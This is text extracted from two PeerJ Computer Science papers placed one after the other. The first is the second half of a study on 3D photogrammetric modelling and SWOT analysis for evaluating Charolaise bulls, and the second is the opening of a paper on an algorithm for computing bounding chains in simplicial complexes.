best 3D textured model. The overlap extent of sequential images taken along the circumference was no less than 70%. Post acquisition processing The sets of images were elaborated with Agisoft Photoscan (Agisoft LLC c©, Russia) software, capable of performing photogrammetric processing of digital images and Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 6/15 https://peerj.com https://doi.org/10.7717/peerjcs.179/fig-2 http://dx.doi.org/10.7717/peerj-cs.179 Figure 3 Series of masks generated from the chunks to eliminate background unnecessary objects. Full-size DOI: 10.7717/peerjcs.179/fig-3 Figure 4 Results from the dense point cloud of the Charolaise bull. Full-size DOI: 10.7717/peerjcs.179/fig-4 generating 3D spatial data, with the algorithm based on Structure from Motion (SFM). Through different consecutive steps starting from the chunk (the original digital image), the relative set of masks is created with the purpose of eliminating objects (masking the unnecessary objects of the picture) from the background (Fig. 3). The pictures are then aligned and a dense point cloud is generated (Fig. 4). Through the mesh of dense point clouds, the software finalizes the procedure through texturing and builds up the so called ‘‘Doll’’ model, from which the 3D model can be exported into different digital formats. Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 7/15 https://peerj.com https://doi.org/10.7717/peerjcs.179/fig-3 https://doi.org/10.7717/peerjcs.179/fig-4 http://dx.doi.org/10.7717/peerj-cs.179 Table 1 Scheme of the SWOT analysis carried out on the basis of intrinsic and extrinsic factors of the innovation of process for Charolaise bull morphology valorization. SWOT analysis Intrinsic factors Strenghts Weakness Opportunities Development of strategies to increase opportunities Minimization of threats to improve opportunitiesExtrinsic Factors Threats Exploit strengths to reduce threats Planning of strategies of defense to reduce threats SWOT analysis of the process “as is” vs. “to be” The bottom-up analysis of Strengths, Weaknesses, Opportunities and Threats was based on the potential of the introduction of the 3D image technology compared with the current scoring system for the beef bull. • Definition of objectives • Identification of users’ needs • Strategies to enhance value • Definition and improvement of services SWOT analysis is based on intrinsic and extrinsic factors of the process that were analyzed as reported in Table 1. In this context, the opportunity offered by electronic identification was explored in the perspective of the creation of a virtual database where 3D images of bulls could be uploaded with the individual electronic identification code and the farm of origin. The implementation of the system with the introduction of such a new technological tool within the process would contribute to identifying the objectives to satisfy the concept expressed by Guatri (1991), according to whom the final goal of business relies on the capability of continuous auto-regeneration over time, with the sustainable creation of economic value. In the light of the evaluation of the system ‘‘as is’’ (based on the current 2D evaluation score) and ‘‘to be’’ (after the development of the 3D model for digital archiving and digital data sharing) SWOT analysis was conducted to explore the introduction of 3D innovations to instrumental management for the evaluation of the breeding bull. This evaluation therefore focused on the specific extrinsic and intrinsic factors of the evaluation process to test whether the reduction of the technological gap on the farm (bottom) offers opportunities for and/or poses threats to the creation of economic value for farmers and, potentially, for stakeholders (scale-up). Calculations, data analysis and statistics A series of measurements for wither’s height, body length and rear trimness was carried out in vivo on each bull and on the respective 3D virtual model, until reaching the same value for three replicates. The positive predictive value (PPV), sensitivity (or true positive rate, TPR), specificity (or true negative rate, TNR) and accuracy (ACC) of the biometric measurements determined Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 8/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.179 Figure 5 Body measure taken on the 3D-bull model. Sequence of the topline (A), wither’s height (B) and rear trimness (C). Full-size DOI: 10.7717/peerjcs.179/fig-5 on the 3D model in comparison with those retrieved from the real animal were calculated using the following formulas: PPV = TP (TP+FP) ×100; TPR= TP (FP+TN ) ×100; TNR= TN (FP+TN ) ×100; Acc = (TP+TN ) (TP+TN +FP+FN ) ×100, where TP is the number of virtual measurements matching with real measurements, FP is the number of different virtual measurements matching with real measurements, TN is the number of different virtual measurements differing from the real measurements, FN is the number of virtual measurements differing from real measurements. The analysis of variance between means of the two series of measurements collected in vivo and on the 3D virtual model was carried out by ANOVA with SAS 9.2 (SAS Inst. Inc. Cary, NC). Results were considered statistically significant when p < 0.05. RESULTS The least frame capturing required 81 images in this trial, with an at least 70% overlap between subsequent pictures on a 360◦ total capturing per bull. The operator moved around the animal in the geo-referenced system which allowed body proportions to be established. The process of image capturing took between 20′ and 22′ per bull. Somatic measurements collected in vivo and on the 3D-bull (Fig. 5) did not differ in a significant way. When comparing the two systems for taking somatic measurements the fact that no statistical significance between in vivo and virtual values was detected appeared highly Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 9/15 https://peerj.com https://doi.org/10.7717/peerjcs.179/fig-5 http://dx.doi.org/10.7717/peerj-cs.179 Table 2 Body measures of the live animal and respective 3D model. In vivo and virtual values are re- ported as means and pooled-SD, express in meter. Statistic significance is set for p-value < 0.05. Body measures (m) in vivo virtual pooled-SD p-value Topline 1.55 1.53 0.02 0.296 Wither height 1.46 1.44 0.01 0.069 Rear trimness 0.50 0.50 0.01 0.561 Performance of the 3D bull TPR % 80 TNR % 70 PPV % 89 Accuracy % 100 Table 3 Scheme of the SWOT analysis emerged from the analysis of the process for Charolais bull morphology valorization. SWOT analysis Valorization of Charolais breeding bull morhology Strengths Weaknesses Intrinsic factors •Competitiveness of bull genetic value • Experienced farmers • Worldwide market • AI diffused for semen trade • High dressing % of progeny • Restrictions of animal movement • Costs of transport • Stressful conditions • Technology delay Opportunities Threats Extrinsic factors • Visibility of bull morphology • Generational change • Automation of operations • Limited investment to update the system • Virtual net of buyers/suppliers • E-commerce potentials • Aging population • Ethical trends on animal product consumption • Old fashioned scoring system • Climate change • Standardization of the system • Infectious disease encouraging for the adoption of the system in the field. Table 2 summarizes the results on 3D bull performance. In Table 3, results from the SWOT analysis are reported. On the basis of the series of measurements carried out both in vivo and on the 3D bull, the positive predictive value and the accuracy of the system turned out to range from 89% to 100% for the three sets of body measurements for wither’s height, body length and rear trimness. DISCUSSION The opportunity offered by 3D digital imaging to carry out body measurements on a 3D-bull model improves the current system of morphological scoring considerably by objectifying evaluations. Indeed, the 2D grid with a schematic illustration of the generic bovine has to be filled in manually and does not allow any automation. On the other hand, the 3D bull is a faithful reproduction of the live animal, and is hence highly suitable for the morphological evaluation and appraisal of the genetic potential as a breeding bull through the phenotype. Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 10/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.179 Among the advantages offered by the 3D bull model, the collection of body measurements can be carried out in a safe way, much more comfortably for both the breed evaluator and the bull. In fact, fairs and the presence of other bulls during the scoring process may represent a stressful condition for the animal, which may react to the environmental stimuli in unpredictable ways. While expert personnel and animal friendly facilities are provided during fairs, safe conditions for operators and animal protection may be improved by the evaluation of the virtual model. Additionally, 3D digital images of bulls saved in purposely created virtual archives may ease access and the sharing of data among stakeholders. Such digital archives can greatly improve the visibility of the genetic (through the individual electronic code for genealogy) and phenotypic (morphological) value of the bull and potentially broaden the horizons of e-commerce if made available to a network of stakeholders. This opportunity opens up a series of considerations connected with different aspects of beef cattle management. When artificial insemination (AI) is used, the opportunity offered by the digital evaluation of bull morphology would allow the creation of a virtual archive for the e-commerce of semen from bulls with a high profile for functional traits. In the SWOT analysis of the evaluation process of Charolaise bull morphology, we identified internal weaknesses in the costs of animal transport and animal welfare issues, both during transportation and exposition in dedicated fairs. In the ‘‘as is’’ process, the farmer must subscribe bulls to dedicated fairs both on regional and national levels, for which economic resources must be set aside to cover travel and subscription costs. In the ‘‘to be’’ process, the farmer will be able to subscribe animals to online virtual fairs, where animal morphology can be accessed by other remote subscribers and stakeholders thanks to the electronic code associated with the 3D model of the live bull. In this way, internal weaknesses can be minimized. The possibility of having a virtual archive where digital images of animals can be reached by stakeholders means that the animals do not have to be moved from the farm, hence offering substantial savings on travel costs. Reducing stress for the animals due to handling and their being loaded onto means of transport to reach unfamiliar settings is in agreement with other efficient solutions proposed by PLF (Banhazi et al., 2012; Berckmans, 2014) to optimise breeding and management practices on site. However, as the system is somewhat advanced, some stakeholders may be unready for the technology and this may lead to a delay in the standardization of the 3D-model based system. Electronic identification through the RFID technology represents both a sound and reliable method for animal identification and a very promising system for the implementation of a virtual archive of recorded animals through the electronic digital number of the transponder, as observed in other filiéres (Cappai et al., 2014; Cappai et al., 2018; Cappai, Rubiu & Pinna, 2018). In the case of the electronically identified 3D bull, the record was implemented with 3D virtual images. The 3D-bull model for morphological evaluation through a scoring system has a series of indirect advantages, related to both animal health and welfare. The evaluation of animal morphology raised on farms can be promoted also when sanitary restrictions to the movement of animals are in force. As an external threat considered in the SWOT analysis, the presence of infectious diseases may Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 11/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.179 impact negatively on animal movements outside the farm. For instance, in the case of Blue Tongue positivity in sheep of a given region, cattle movements are also restricted as bovines are a natural reservoir of the virus, despite not being clinically involved. Thus, participation in fairs, as well as movement for trading are forbidden, with consequent profit losses. The SWOT analysis pointed to different opportunities offered by the introduction of the 3D model for the evaluation of bull morphology oriented to an up-to-date competitive strategy for the sector. In fact, the analysis of the process ‘‘as is’’ and ‘‘to be’’ clearly highlights how the digital 3D model performance on the basis of the PPV can implement the evaluation system in a smart, contactless and automated way, which is easily shareable and accessible, whereas the 2D scoring system does not. The threat of external factors may be the most difficult aspect to deal with. So-called red meat consumption may decrease in the future, unless appropriate marketing strategies and adequate public information are prompted. This threat was considered in the SWOT analysis due to the increasingly aging population and their choice to prefer so-called ‘‘white meat’’ (that of poultry and rabbit). In addition, climate changes may pose the question of environmentally sustainable farming systems, with a potential contraction of meat consumption. Finally, ethical movements against animal product consumption may also influence market choices. CONCLUSIONS The results obtained from testing the feasibility of an innovative and technologically advanced methodological approach based on the implementation of an RIFD and 3D imaging system aimed to provide a general overview of valuable opportunities offered by the upgrade of the current system. The instrumental evaluation of bull morphology of the Charolaise breed in a completely digital 3D image successfully reflects that of the morphology of the live animal. The upgrade into a high-tech system for the evaluation of the breeding bull shows several potential applications as illustrated in the SWOT analysis leading to the innovation of the process. In perspective, the opportunities offered by such an innovative methodological approach may lead to the scale up of the integrated system based on individual RFID identification along with that of 3D digital image of the bull. In fact, the model has the potential for virtual archive creation and the experimental approach appears highly encouraging for further work to check scalability to a large number of animals. ACKNOWLEDGEMENTS The authors would like to thank Mr. Michele Filigheddu for his cooperation during fieldwork activities on his farm and for providing basic production data. The authors are also thankful to Dr. Santino Cherchi for his help during the study. The authors express their gratitude to A.N.A.C.L.I. Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 12/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.179 ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Nicola Graziano Rubiu is the administrator and technical Director of NurEID. The authors declare there are no competing interests. Author Contributions • Maria Grazia Cappai conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • Filippo Gambella conceived and designed the experiments, contributed reagents/mate- rials/analysis tools, performed the computation work, approved the final draft. • Davide Piccirilli performed the experiments, prepared figures and/or tables, performed the computation work, approved the final draft. • Nicola Graziano Rubiu analyzed the data, authored or reviewed drafts of the paper, approved the final draft, analysis of process and SWOT analysis. • Corrado Dimauro performed the experiments, analyzed the data, approved the final draft. • Antonio Luigi Pazzona contributed reagents/materials/analysis tools, performed the computation work, approved the final draft. • Walter Pinna contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Database of raw biometric measures from the live animal and the 3D model are available in the Supplemental Materials. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.179#supplemental-information. REFERENCES Banhazi TM, Lehr H, Black JL, Crabtree H, Schofield P, Tscharke M, Berckmans D. 2012. Precision Livestock Farming: an international review of scientific and commercial aspects. International Journal of Agricultural and Biological Engineering 5(3):1. Berckmans D. 2014. Precision livestock farming technologies for welfare management in intensive livestock systems. Revue Scientifique Et Technique-Office International Des Epizooties 33(1):189–96. Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 13/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.179#supplemental-information http://dx.doi.org/10.7717/peerj-cs.179#supplemental-information http://dx.doi.org/10.7717/peerj-cs.179#supplemental-information http://dx.doi.org/10.7717/peerj-cs.179 Briggs HM, Briggs DM. 1980. Modern breeds of livestock. Fourth Edition. London: McMillian. Burrow HM, Corbet NJ. 2000. Genetic and environmental factors affecting temperament of zebu and zebu-derived beef cattle grazed at pasture in the tropics. Australian Journal of Agricultural Research 51:155–162 DOI 10.1071/AR99053. Burrow HM, Dillon RD. 1997. Relationship between temperament and growth in a feedlot and commercial carcass traits in Bos indicus crossbreds. Australian Journal of Experimental Agriculture 37:407–411 DOI 10.1071/EA96148. Cappai MG, Picciau M, Nieddu G, Bitti MPL, Pinna W. 2014. Long term performance of RFID technology in the large scale identification of small ruminants through elec- tronic ceramic boluses: implications for animal welfare and regulation compliance. Small Ruminant Research 117:169–175 DOI 10.1016/j.smallrumres.2013.12.031. Cappai MG, Rubiu NG, Nieddu G, Bitti MPL, Pinna W. 2018. Analysis of fieldwork activities during milk production recording in dairy ewes by means of individual ear tag (ET) alone or plus RFID based electronic identification (EID). Computers and Electronics in Agriculture 144:324–328 DOI 10.1016/j.compag.2017.11.002. Cappai MG, Rubiu NG, Pinna W. 2018. Economic assessment of a smart traceability system (RFID+DNA) for origin and brand protection of the pork product labelled suinetto di Sardegna. Computers and Electronics in Agriculture 145:248–253 DOI 10.1016/j.compag.2018.01.003. D’Eath RB, Jack M, Futro A, Talbot D, Zhu Q, Barclay D, Baxter EM. 2018. Automatic early warning of tail biting in pigs: 3D cameras can detect lowered tail posture before an outbreak. PLOS ONE 13(4):e0194524. De Souza Fonseca PA, Id-Lahoucine S, Reverter A, Medrano JF, Fortes MS, Casellas J, Miglior F, Brito L, Carvalho MRS, Schenkel FS, Nguyen LT, Porto-Neto LR, Thomas MG, Cánovas A. 2018. Combining multi-OMICs information to identify key-regulator genes for pleiotropic effect on fertility and production traits in beef cattle. PLOS ONE DOI 10.1371/journal.pone.0205295. Fournel S, Rousseau AN, Laberge B. 2017. Rethinking environment control strategy of confined animal housing systems through precision livestock farming. Biosystems Engineering 155:96–123 DOI 10.1016/j.biosystemseng.2016.12.005. Gibb DJ, McAllister TA, Huisma C, Wiedmeier RD. 1998. Bunk attendance of feedlot cattle monitored with radio frequency technology. Canadian Journal of Animal Science 78:707–710 DOI 10.4141/A98-032. Guatri L. 1991. La teoria di creazione del valore. Milano: EGEA. Kosgro J. 2014. Estimation of pig weight using a Microsoft Kinect prototype imaging system. Computers and Electronics in Agriculture 109:32–35 DOI 10.1016/j.compag.2014.08.008. Leal WS, Costa RF, Cardoso LL, Mendonça FS, Cardoso FF, Yokoo MJ, Weaber RL. 2018. Bio-economic model predicts economic values for beef production. Kansas Agricultural Experiment Station Research Reports 4:1–4 DOI 10.4148/2378-5977.7534. Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 14/15 https://peerj.com http://dx.doi.org/10.1071/AR99053 http://dx.doi.org/10.1071/EA96148 http://dx.doi.org/10.1016/j.smallrumres.2013.12.031 http://dx.doi.org/10.1016/j.compag.2017.11.002 http://dx.doi.org/10.1016/j.compag.2018.01.003 http://dx.doi.org/10.1371/journal.pone.0205295 http://dx.doi.org/10.1016/j.biosystemseng.2016.12.005 http://dx.doi.org/10.4141/A98-032 http://dx.doi.org/10.1016/j.compag.2014.08.008 http://dx.doi.org/10.4148/2378-5977.7534 http://dx.doi.org/10.7717/peerj-cs.179 Moore KL, Mrode R, Coffey MP. 2017. Genetic parameters of Visual Image Analysis primal cut carcass traits of commercial prime beef slaughter animals. Animal 11(10):1653–1659 DOI 10.1017/S1751731117000489. Nkrumah JD, Crews Jr DH, Basarab JA, Price MA, Okine EK, Wang Z, Li C, Moore SS. 2007. Genetic and phenotypic relationships of feeding behavior and temperament with performance, feed efficiency, ultrasound, and carcass merit of beef cattle. Journal of Animal Science 85:2382–2390 DOI 10.2527/jas.2006-657. Robinson DL, Oddy VH. 2004. Genetic parameters for feed efficiency, fatness, muscle area and feeding behavior of feedlot finished beef cattle. Livestock Production Science 90:255–270 DOI 10.1016/j.livprodsci.2004.06.011. Schwartzkopf-Genswein KS, Atwood S, McAllister TA. 2003. Use of remote bunk monitoring to record effect of breed, feeding regime and weather on feeding behavior and growth performance of cattle. Canadian Journal of Animal Science 83:29–38 DOI 10.4141/A02-027. Soulat J, Picard B, Léger S, Monteils V. 2018. Prediction of beef carcass and meat quality traits from factors characterising the rearing management system applied during the whole life of heifers. Meat Science 140:88–100 DOI 10.1016/j.meatsci.2018.03.009. Sowell BF, Bowman JGP, Branine ME, Hubbard ME. 1998. Radio frequency technology to measure feeding behavior and health of feedlot steers. Applied Animal Behaviour Science 59:277–284 DOI 10.1016/S0168-1591(98)00110-5. Su H, Golden B, Hyde L, Sanders S, Garrick D. 2017. Genetic parameters for carcass and ultrasound traits in Hereford and admixed Simmental beef cattle: accu- racy of evaluating carcass traits. Journal of Animal Science 95(11):4718–4727 DOI 10.2527/jas2017.1865. Voisinet BD, Grandin T, Tatum JD, O’Connor SF, Struthers JJ. 1997. Feedlot cattle with calm temperaments have higher average daily gains than cattle with excitable temperaments. Journal of Animal Science 75:892–896 DOI 10.2527/1997.754892x. Wu J, Tillett R, Mcfarlane NJB, Ju X, Siebert JP, Schofield . 2004. Extracting the three- dimensional shape of live pigs using stereo photogrammetry. Computers and Electronics in Agriculture 44(3):203–222 DOI 10.1016/j.compag.2004.05.003. Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 15/15 https://peerj.com http://dx.doi.org/10.1017/S1751731117000489 http://dx.doi.org/10.2527/jas.2006-657 http://dx.doi.org/10.1016/j.livprodsci.2004.06.011 http://dx.doi.org/10.4141/A02-027 http://dx.doi.org/10.1016/j.meatsci.2018.03.009 http://dx.doi.org/10.1016/S0168-1591(98)00110-5 http://dx.doi.org/10.2527/jas2017.1865 http://dx.doi.org/10.2527/1997.754892x http://dx.doi.org/10.1016/j.compag.2004.05.003 http://dx.doi.org/10.7717/peerj-cs.179 work_mfo4kdtxkze3tmgueggfzpuxci ---- Submitted 4 August 2017 Accepted 10 April 2018 Published 28 May 2018 Corresponding author J. Frederico Carvalho, jfpbdc@kth.se Academic editor Mark Wilson Additional Information and Declarations can be found on page 11 DOI 10.7717/peerj-cs.153 Copyright 2018 Carvalho et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS An algorithm for calculating top- dimensional bounding chains J. Frederico Carvalho1, Mikael Vejdemo-Johansson2, Danica Kragic1 and Florian T. Pokorny1 1 CAS/RPL, KTH, Royal Institute of Technology, Stockholm, Sweden 2 Mathematics Department, City University of New York, College of Staten Island, New York, NY, United States of America ABSTRACT We describe the Coefficient-Flow algorithm for calculating the bounding chain of an (n−1)-boundary on an n-manifold-like simplicial complex S. We prove its correctness and show that it has a computational time complexity of O(|S(n−1)|) (where S(n−1) is the set of (n−1)-faces of S). We estimate the big-O coefficient which depends on the dimension of S and the implementation. We present an implementation, experimentally evaluate the complexity of our algorithm, and compare its performance with that of solving the underlying linear system. Subjects Algorithms and Analysis of Algorithms, Data Science, Scientific Computing and Simulation Keywords Homology, Computational algebraic topology INTRODUCTION Topological spaces are by and large characterized by the cycles in them (i.e., closed paths and their higher dimensional analogues) and the ways in which they can or cannot be deformed into each other. This idea had been recognized by Poincaré from the beginning of the study of topology. Consequently much of the study of topological spaces has been dedicated to understanding cycles, and these are the key features studied by the topological data analysis community (Edelsbrunner & Harer, 2010). One key part of topological data analysis methods is to distinguish between different cycles; more precisely, to characterize different cycles according to their homology class. This can be done efficiently using cohomology (Pokorny, Hawasly & Ramamoorthy, 2016; Edelsbrunner, Letscher & Zomorodian, 2002). However, such methods only distinguish between non-homologous cycles, and do not quantify the difference between cycles. A possible way to quantify this difference is to solve the problem of finding the chain whose boundary is the union of the two cycles in question, as was proposed in Chambers & Vejdemo-Johansson (2015) by solving the underlying linear system, where the authors also take the question of optimality into account (with regards to the size of the resulting chain). This line of research ellaborates on Dey, Hirani & Krishnamoorthy (2011) where the authors considered the problem of finding an optimal chain in the same homology class as a given chain. More recently, in Rodríguez et al. (2017) the authors have taken a similar approach to ours using a combinatorial method to compute bounding chains of 1-cycles on 3-dimensional simplicial complexes. How to cite this article Carvalho et al. (2018), An algorithm for calculating top-dimensional bounding chains. PeerJ Comput. Sci. 4:e153; DOI 10.7717/peerj-cs.153 https://peerj.com mailto:jfpbdc@kth.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.153 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.153 In this paper, we explore the geometric properties of simplicial n-manifolds to provide an algorithm that is able to calculate a chain whose boundary is some prescribed (n−1)- dimensional cycle, and we show that the proposed algorithm has a complexity which is linear in the number of (n−1)-faces of the complex. This is substantially faster than calculating a solution to the linear system as considered in Chambers & Vejdemo-Johansson (2015), for which the complexity would be, at least, quadratic on the number of n-dimensional faces (Gloub & Van Loan, 1996). Background In what follows we make extensive use of sequences. Therefore, for any n∈N, we abbreviate x0,...,xn to x0:n. Simplicial complexes Given a set of points P ⊆Rn, we define a k-dimensional simplex, or k-simplex, on points of P as the ordered set [p0:k], where p0:k ∈P are k+1 affinely independent points and are called the vertices of [p0:k]. We represent the simplex [p0:k] by the convex hull of the points p0:k, and we say that two simplices are the same if they have the same points and the ordering of the points differs only by an even permutation. If the ordering differs by an odd permutation we say they have opposite orientations. Since a convex hull of a finite set of points is a bounded closed set, it carries the notion of a boundary ∂[p0:k] which is defined as: ∂[p0:k]=[p1:k]+( k−1∑ i=1 (−1)i[p0:i−1,pi+1:k])+(−1) k [p0:k−1]. The above sum can be interpreted as a ‘‘union with orientation’’, and multiplying by 1 or −1 is the identity or a reversal of orientation, respectively. Note that if p0:k are affinely independent, then the boundary of the convex hull does indeed correspond to the union of the convex hulls of all subsets of {p0:k} with k distinct points. For example, the boundary of the simplex [p0,p1,p2] is given by: [p0,p1]−[p0,p2]+[p1,p2] Applying the only possible orientation-reversing permutation to [p0,p2] gives [p0,p1]+[p1,p2]+[p2,p0]. This corresponds to the union of the edges that form the boundary of the triangle [p0,p1,p2] oriented in such a way as to form a closed path. Definition 1. A set of points P ⊆Rn and a set of simplices T ={σ0:N}defines a geometric simplicial complex S=(P,T) if any finite subset of a simplex in T is also in T, and given any two simplices [p0:k],[q0:k′]∈T, the intersection of the convex hulls [p0:k]∩[q0:k′] is the convex hull of {p0:k}∩{q0:k′}and is also a simplex in T . For any d we define the d-skeleton of T by Td ={σ ∈T|dimσ 6d}and the d-th level as T(d)={σ ∈T|dimσ =d}. Given two simplices σ,τ we write τ Cσ if τ ⊂σ and dimτ =dimσ−1 which can be read as ‘‘τ is a top-dimensional face of σ ’’. Note that C is not transitive, and therefore it is Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 2/12 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.153 not a preorder. Its transitive closure, τ <σ however, defines a preorder. We can thus read τ <σ as ‘‘τ is contained in the boundary of σ ’’ or simply ‘‘τ is a face of σ ’’. We say that a simplicial complex S=(P,T) has dimension d if d is the largest integer such that T(d) 6=∅. Definition 2. A d-dimensional simplicial complex S=(P,T) is called a d-manifold-like simplicial complex if • for every τ ∈Td−1 there exists some σ ∈T(d) such that σ >τ , and • if dimτ =(d−1) then there are at most two σ ∈T(d) satisfying σ >τ . Note that a triangulation of a d-manifold is a manifold-like simplicial complex, however the definition also includes other spaces like triangulations of manifolds with boundary and the pinched torus. Algebraic description We will focus on finite geometric simplicial complexes S=(P,T) (where |P|,|T|<∞). Since such an S has a finite number of simplices, we can define for each level 06k 6dim(S) an injective function ιk :T(k) →N such that ιk(T(k))={1,...,|T(k)|}; we call ι an enumeration of T(k). From this we define the chain complex associated with S. Definition 3. Given a simplicial complex S=(P,T) the chain complex associated with S is defined as the pair {(Ck(S),dk)} +∞ k=0 where the Ck(S) are vector spaces defined as Ck(S)= R|T (k) | and the dk are linear maps dk : Ck(S) → Ck−1(S) defined on basis elements as dk(ei)= ∑ τ∈∂(ι−1k (i)) o(i,τ)eιk−1(τ) where o(i,τ) is the orientation of τ induced by the boundary of σ = ι−1k (i). It can be shown that dk ◦dk+1 =0, which allows us to define, for each k, the k-th homology group of S as Hk(S)=ker(dk)/im(dk+1). By a slight abuse of notation, for a simplicial complex S=(P,T) and a k-chain c, we write cσ for the coefficient corresponding to σ , eσ for the corresponding basis element and d for the appropriate boundary map whenever these are clear from their contexts. We call the elements p∈Ck(S) such that dp=0, k-cycles. Two k-cycles p,p′ are said to be homologous if there exists a chain c ∈Ck+1(S) such that dc =p−p′, so that p−p′ is called a k-boundary. This defines k-homology as the group of k-cycles quotiented by the homology relation. Problem description and contribution We are interested in the bounding chain problem, that is, given a cycle p, we want to decide whether or not p is a boundary, and in case it is, provide a witness in the form of a chain c such that ∂c =p; we call c a bounding chain of p. To achieve this, we further specialize the problem to Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 3/12 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.153 1Which corresponds to the number of (k −1)- and k-faces of the complex, respectively. solve: ∂c =p subject to: cσ =v, (1) where p is a specified (n−1)-boundary in an n-manifold-like simplicial complex S, σ is an n-simplex, and v is a pre-specified real number. In general, the equation ∂c =p has more than one solution c, therefore by adding the constraint cσ =v we are able to make this solution unique. The Coefficient-Flow algorithm that we present solves this restricted form of the bounding chain problem (by providing one such bounding chain if it exists) and has computational time complexity of O(|S(n−1)|). Furthermore, we show how the parameters σ and v can be done away with in cases where the chain is unique, and we discuss how this algorithm can be used to find a minimal bounding chain. Related work In Chambers & Wang (2013) the authors address the problem of computing the area of a homotopy between two paths on 2-dimensional manifolds, which can be seen as a generalization of the same problem, for 2-dimensional meshes via the Hurewicz map (Hatcher, 2002). In Chambers & Vejdemo-Johansson (2015) the authors provide a method for calculating the minimum area bounding chain of a 1-cycle on a 2d mesh, that is the solution to the problem argmincarea(c)=p, where ∂c =p (2) and p is a 1-chain on a given simplicial complex. This is done by using optimization methods for solving the associated linear system. These methods however have time complexity lower-bounded by matrix multiplication time which is in �(min(n,m)2) where n,m are the number of rows and columns of the boundary matrix1 (Davie & Stothers, 2013). This complexity quickly becomes prohibitive when we handle large complexes, such as one might find when dealing with meshes constructed from large pointclouds. More recently, in Rodríguez et al. (2017) the authors proposed a method for computing bounding chains of 1-cycles in 3-dimensional complexes, using a spanning tree of the dual graph of the complex. In Dey, Hirani & Krishnamoorthy (2011) the authors address the related problem of efficiently computing an optimal cycle p′ which is homologous to a given cycle p (with Z coefficients). This is a significant result given that in Chambers, Erickson & Nayyeri (2009) the authors proved that this cannot be done efficiently (i.e., in polynomial time) for 1-cycles using Z2 coefficients, a result that was extended in Chen & Freedman (2011) to cycles of any dimension. METHODOLOGY For any simplicial complex S, and any pair of simplices σ,τ ∈S such that, τ Cσ , we define the index of τ with respect to σ as 〈τ,∂σ〉=〈eτ,deσ〉 (Forman, 1998). Note that the index corresponds to the orientation induced by the boundary of σ on τ and can be computed in O(d) time by the following algorithm: Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 4/12 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.153 Index(σ,τ): param: σ - k-simplex represented as a sorted list of indices of points. param: τ - (k−1)-face of σ represented as a sorted list of indices. 1: for each i←0...dimτ : 2: if τi 6=σi: 3: orientation←(−1)i 4: break loop 5: return orientation By inspecting the main loop we can see that Index(σ,τ) returns (−1)i where i is the index of the first element at which σ and τ differ. We assume τ is a top dimensional face of σ , so if σ =[s0:d], then by definition τ =[s0:(i−1),s(i+1):d] for some i, and so the coefficient of τ in the boundary of σ is (−1)i as per the definition of the boundary operator. This is also the index of the first element at which τ and σ differ, since they are represented as sorted lists of indices. The following is an intuitive result, that will be the basis for the Coefficient-Flow algorithm that we will present in the sequel. Proposition 1. Let S be a manifold-like simplicial complex, let c be an n-chain on S and p its boundary. Then for any pair of n-simplices σ 6=σ ′ with ∂σ∩∂σ ′={τ}we have: cσ =〈τ,∂σ〉(pτ −〈τ,∂σ ′ 〉cσ ′). Proof. If we expand the equation ∂c =p, we get pτ = ∑ τCω〈eτ,d(cωeω)〉, recall that by definition d(cωeω)= ∑ νCω〈ν,∂ω〉cωeν; and so we get pτ = ∑ τCω〈τ,∂ω〉cωeτ . Now since S is a manifold-like simplicial complex and τ =∂σ∩∂σ ′, then σ,σ ′ are the only cofaces of τ , and hence we have: pτ =〈τ,∂σ〉cσ +〈τ,∂σ ′ 〉cσ ′ which can be reorganized to cσ = pτ−〈τ,∂σ ′〉cσ′ 〈τ,∂σ〉 . Finally, since the index 〈τ,∂σ〉 is either 1 or −1, we can rewrite this equation as: cσ =〈τ,∂σ〉(pτ −〈τ,∂σ ′ 〉cσ ′) Next, we present an algorithm to calculate a bounding chain for a (n−1)-cycle in an n-manifold-like simplicial complex. The algorithm proceeds by checking every top- dimensional face σ , and calculating the value of the chain on adjacent top-dimensional faces, using Proposition 1. In order to prove that the Coefficient-Flow algorithm solves problem (1), will use the fact that we can see the algorithm as a traversal of the dual graph. Definition 4. Given an n-dimensional simplicial complex S, recall that the dual graph is a graph G(S)=(V,E) with set of vertices V =S(n) and (σ,σ ′)∈E if dim(σ∩σ ′)=n−1. Proposition 2. If S is a manifold-like simplicial complex, where G(S) is connected, and p is an (n−1)-boundary, then Coefficient- Flow(p,σ,v) returns a bounding chain c of p satisfying cσ =v, if such a boundary exists. Furthermore, the main loop (05–21) is executed at most O(|S(n−1)|) times. Carvalho et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.153 5/12 